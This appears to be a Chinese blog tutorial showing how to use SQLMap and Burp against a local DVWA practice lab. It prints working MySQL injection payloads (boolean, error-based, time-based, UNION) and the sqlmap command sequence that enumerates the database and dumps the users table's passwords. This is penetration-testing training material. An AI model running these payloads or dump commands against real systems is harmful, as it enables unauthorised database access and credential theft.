第四更

最新推荐文章于 2021-09-16 18:49:34 发布
最新推荐文章于 2021-09-16 18:49:34 发布
阅读量527 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39670065/article/details/103654359
版权

SQLMap简单使用

这里使用DVWA进行SQL注入测试
(需要了解DVWA的搭建和SQLMap的配置)

1.启动phpstudy,在浏览器中输入127.0.0.1/dvwa

进入登陆界面,默认账号密码分别为admin,password
在这里插入图片描述在DVWA Security中Security Level 选为
Low 点击Submit

2.使用burp进行抓包,找到含参数的数据包

在User ID栏中输入admin,Sumbit 通过抓包找到含参数id的数据包

在这里插入图片描述
将内容全选,粘贴到新建txt文本中,在id=的值后加*

4.使用cmd调起SQLMap

在cmd中使用sqlmap.py -r 并将新建的txt文档拖入cmd中,回车执行

在这里插入图片描述custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]

在这里插入图片描述it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

在这里插入图片描述for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

在这里插入图片描述

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: http://127.0.0.1:80/dvwa/vulnerabilities/sqli/?id=admin' OR NOT 4783=4783#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://127.0.0.1:80/dvwa/vulnerabilities/sqli/?id=admin' AND (SELECT 8193 FROM(SELECT COUNT(*),CONCAT(0x7162787a71,(SELECT (ELT(8193=8193,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- atoK&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://127.0.0.1:80/dvwa/vulnerabilities/sqli/?id=admin' AND (SELECT 3212 FROM (SELECT(SLEEP(5)))lMml)-- vPSI&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: http://127.0.0.1:80/dvwa/vulnerabilities/sqli/?id=admin' UNION ALL SELECT CONCAT(0x7162787a71,0x6b75487261416a52637749597351466f57566a62706b4d6a764e537172556f736d6176484c775055,0x717a7a7871),NULL#&Submit=Submit

说明可通过以上三种方式测试

  1. sqlmap.py -r C:\Users\王\Desktop\简单测试.txt --dbs在这里插入图片描述找到数据库
  2. sqlmap.py -r C:\Users\王\Desktop\简单测试.txt -D dvwa --tables

在这里插入图片描述
找到dvwa数据库下的两个表

3.sqlmap.py -r C:\Users\王\Desktop\简单测试.txt -D dvwa -T users --columns

在这里插入图片描述找到users表下的字段

4.sqlmap.py -r “C:\Users\王\Desktop\新建文本文档 (2).txt” -D dvwa -T users -C user,user_id,password --dump

在这里插入图片描述找到账号密码,进行md5解码

OVER

wu_ceng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python全栈(五)Web安全攻防之7.MySQL注入读写文件和HTTP头中的SQL注入
CUFEECR的博客
03-10 4499
pikachu是一个比较详细的漏洞平台;MySQL读取文件用load_file()函数;写入文件用into outfile。UPDATEXML()函数用于捕捉错误;在user-agent后加入payload进行user-agent注入;通过修改请求头中的referer进行SQL注入测试,可以通过3种方式进行安全测试;在请求头的cookie参数中加入payload‘进行cookie测试;使用Base64加密的注入语句,插入到Cookie对应的位置完成SQL注入漏洞的探测。
Python全栈(五)Web安全攻防之3.sqlmap的使用介绍
CUFEECR的博客
02-27 5071
SQL注入,就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令;Sqlmap的输出信息按从简到繁共分为7个级别依次为0、1、2、3、4、5和6;sqlmap获取目标的方式有直连数据库、指定目标URL和读取不同文件类型进行SQL注入3种方式。sqlmap设置请求参数的类型包括HTTP方法、设置post提交参数、设置cookie参数、设置user-agent、设置代理、设置延迟、设置超时、设置超时重试次数、设置随机参数、设置忽略401和避免被屏蔽等。
sqlmap学习(八)指定位置注入
rane的博客
03-26 1万+
1、sqlmap设置指定注入参数 -p:指定参数进行扫描,不是扫描所有参数,这样可以避免浪费时间到非注入点参数上,从而提高扫描效率。 python sqlmap.py -u "url" -p "id,user-agent" --skip跳过指定参数扫描,和-p作用相反,它用来跳过需要扫描的参数。 python sqlmap.py -u "url" --skip "id,user-agent" ...
soap注入某sql2008服务器结合msf进行提权
xiaoi123的博客
06-05 3217
原文作者:陈小兵    在实际成功渗透过程中,漏洞的利用都是多个技术的融合,最新技术的实践,本次渗透利用sqlmap来确认注入点,通过sqlmap来获取webshell,结合msf来进行ms16-075的提权,最终获取了目标服务器的系统权限。本文算是漏洞利用的一个新的拓展,在常规Nday提权不成功的情况下,结合msf进行ms16-075成功提权的一个经典案例。1.1.1扫描soap注入漏洞    ...
第四阶段第四阶段第四阶段第四阶段
03-24
【标题】:“第四阶段第四阶段第四阶段第四阶段” 【描述】:“第四阶段” 在IT行业中,"第四阶段"通常指的是项目、学习或技术发展过程中的一个特定阶段。这个阶段可能涉及深化理解、实践应用、问题解决或系统集成...
algs4_algs4_算法第四版_
10-02
6. **教育与实践**:《算法第四版》不仅是一本学术著作,是一个强大的学习工具。它鼓励读者动手实践,通过编写和运行代码来验证理论,培养问题解决和编程思维。 7. **版本新**:“第四版”通常意味着前几版的...
计算机操作系统第四版课后习题答案.pdf
01-18
计算机操作系统第四版课后习题答案 计算机操作系统是计算机科学中最重要的组成部分之一,涉及到计算机硬件、软件和应用之间的交互。下面是计算机操作系统第四版课后习题答案的知识点总结: 一、操作系统的目标和...
软件工程第四
12-20
通过《软件工程第四版》的学习,读者可以系统掌握软件开发的全过程,理解软件工程中的核心概念和最佳实践,从而在实际工作中做出高质量的软件产品。书中的课后答案部分可以帮助读者检验自己的理解,巩固学习成果。
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3192
学习sqlmap自动注入
Python全栈(五)Web安全攻防之4.sqlmap性能优化和注入技术参数
CUFEECR的博客
03-01 6308
sqlmap性能优化包括设置持久HTTP连接、设置不接收HTTP Body和设置多线程;sqlmap自定义检测参数包括用--level设置检测等级和用--risk设置风险等级;sqlmap设置指定注入参数用-p,当注入点位于URI本身内部时使用*指定注入点;sqlmap强制设置DBMS用--dbms,强制设置OS系统用--os,强制设置无效值替换包括设置大整数、布尔值和随机字符串,去并且可以使用前缀和后缀自定义注入负载位置,可以设置Tamper脚本和DBMS认证;可以设置SQL注入技术和查询的其他参数。
安全测试---burpsuite 抓包 、截包 、改包
weixin_45625252的博客
09-27 6661
安全测试—burpsuite 抓包 、截包 、改包 一、设置代理 (以谷歌浏览器为例) 1、下载安装好burpsuite后(安装自己百度一下,根据步奏安装) 点击run打开软件 点击Proxy ----Options设置 (端口号可以设置8080 也可以设置别的) 2、设置谷歌的代理 设置时 端口号和IP地址需要和burpsuite保持一致 1、点击设置—高级—打开您的计算机代理设置---...
Burp suite抓包修改参数及测试结果验证
u013055734的博客
03-27 6745
Burp suite抓包修改参数及结果验证 Burp suite抓包修改参数及测试结果验证 最近在执行安全测试项时,遇到了要求使用 Burp Suite 修改参数并验证修改后的结果是否正确的测试场景。对于工具的抓包改包,网上有很多优秀的教程,但是对于改包后如何验证结果很少有文章提及,在此结合简单的测试案例将搜索教程时遇到的未解决疑问补充完整 官网免费版下载链接 官网免费版链接:https://po...
sqlmap用法
热门推荐
keepxp的博客
07-28 2万+
Sqlamp Usage https://github.com/sqlmapproject/sqlmap/wiki/Usage Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show ad
BurpSuite8.2 -- 查找包含id参数的URL
weixin_41489908的博客
09-16 226
一、通过BurpSuite随便浏览一下目标主机,越多越好 二、通过筛选,获取我们想要的相关参数 1、在Filterbysearchterm输入筛选词 2、勾选showonlyparameterizedrequests,只显示包含id的请求 3、勾选HTML,只显示html网页 三、直接查看结果 禁止非法,后果自负 欢迎关注公众号:web安全工具库 欢迎关注视频号:之乎者也吧 ...
b050闲置图书分享-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
07-23
本次开发的闲置图书分享平台实现了收货地址管理、字典管理、公告管理、留言板管理、图书管理、图书收藏管理、图书评价管理、图书订单管理、用户管理、管理员管理等功能。系统用到了关系型数据库中王者MySql作为系统的数据库,有效的对数据进行安全的存储,有效的备份,对数据可靠性方面得到了保证。并且程序也具备程序需求的所有功能,使得操作性还是安全性都大大提高,让闲置图书分享平台能从理念走到现实,确确实实的让人们提升信息处理效率。 管理图书的数据,此页面主要实现图书的增加、修改、删除、查看的功能。公告信息管理页面提供的功能操作有:新增公告,修改公告,删除公告操作。公告类型管理页面显示所有公告类型,在此页面既可以让管理员添加新的公告信息类型,也能对已有的公告类型信息执行编辑新,失效的公告类型信息也能让管理员快速删除。
《大学生职业生涯规划与就业指导》大一阶段课程作业
最新发布
07-24
《大学生职业生涯规划与就业指导》大一阶段课程作业
开题报告潮汕特产直销系统 已通过开题答辩的.doc
07-23
随着互联网的高速发展,人们的生活方式发生了翻天覆地的变化,在过去,人们想要购买很远地方的东西会非常麻烦,因为是通信和交通都不是十分的方便,而现在网络购物成为了人们日常生活中不可或缺的一部分。在这样的背景下,互联网与传统行业的融合已经成为了一种不可阻挡的趋势。对于中国特色的潮汕特产来说,这一趋势也带来了巨大的变革和发展机遇[1]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值